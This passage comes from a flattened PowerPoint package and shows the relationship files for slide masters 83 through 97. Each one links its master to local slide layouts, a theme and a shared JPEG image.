Target="../slideLayouts/slideLayout811.xml"/></Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster83.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout829.xml"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout828.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout827.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout826.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout825.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout824.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout823.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout822.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme83.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1.jpeg"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout830.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout821.xml"/></Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster84.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout839.xml"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout838.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout837.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout836.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout835.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout834.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout833.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout832.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme84.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1.jpeg"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout840.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout831.xml"/></Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster85.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout849.xml"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout848.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout847.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout846.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout845.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout844.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout843.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout842.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme85.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1.jpeg"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout850.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout841.xml"/></Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster86.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout859.xml"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout858.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout857.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout856.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout855.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout854.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout853.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout852.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme86.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1.jpeg"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout860.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout851.xml"/></Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster87.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout869.xml"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout868.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout867.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout866.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout865.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout864.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout863.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout862.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme87.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1.jpeg"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout870.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout861.xml"/></Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster88.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout879.xml"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout878.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout877.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout876.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout875.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout874.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout873.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout872.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme88.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1.jpeg"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout880.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout871.xml"/></Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster89.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout889.xml"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout888.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout887.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout886.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout885.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout884.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout883.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout882.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme89.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1.jpeg"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout890.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout88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89.xml"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout88.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout87.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout86.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout85.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout84.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout83.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout82.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme9.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1.jpeg"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout90.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout81.xml"/></Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster90.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout899.xml"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout898.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout897.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout896.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout895.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout894.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout893.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout892.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme90.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1.jpeg"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout900.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout891.xml"/></Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster91.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout909.xml"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout908.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout907.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout906.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout905.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout904.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout903.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout902.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme91.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1.jpeg"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout910.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout901.xml"/></Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster92.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout919.xml"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout918.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout917.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout916.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout915.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout914.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout913.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout912.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme92.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1.jpeg"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout920.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout911.xml"/></Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster93.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout929.xml"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout928.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout927.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout926.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout925.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout924.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout923.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout922.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme93.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1.jpeg"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout930.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout921.xml"/></Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster94.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout939.xml"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout938.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout937.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout936.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout935.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout934.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout933.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout932.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme94.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1.jpeg"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout940.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout931.xml"/></Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster95.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout949.xml"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout948.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout947.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout946.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout945.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout944.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout943.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout942.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme95.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1.jpeg"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout950.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout941.xml"/></Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster96.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout959.xml"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout958.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout957.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout956.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout955.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout954.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout953.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout952.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme96.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1.jpeg"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout960.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout951.xml"/></Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster97.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout969.xml"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout968.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout967.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout966.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout965.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout964.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout963.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout962.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme97.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1.jpeg"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout970.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout961.xml"/></Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster98.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
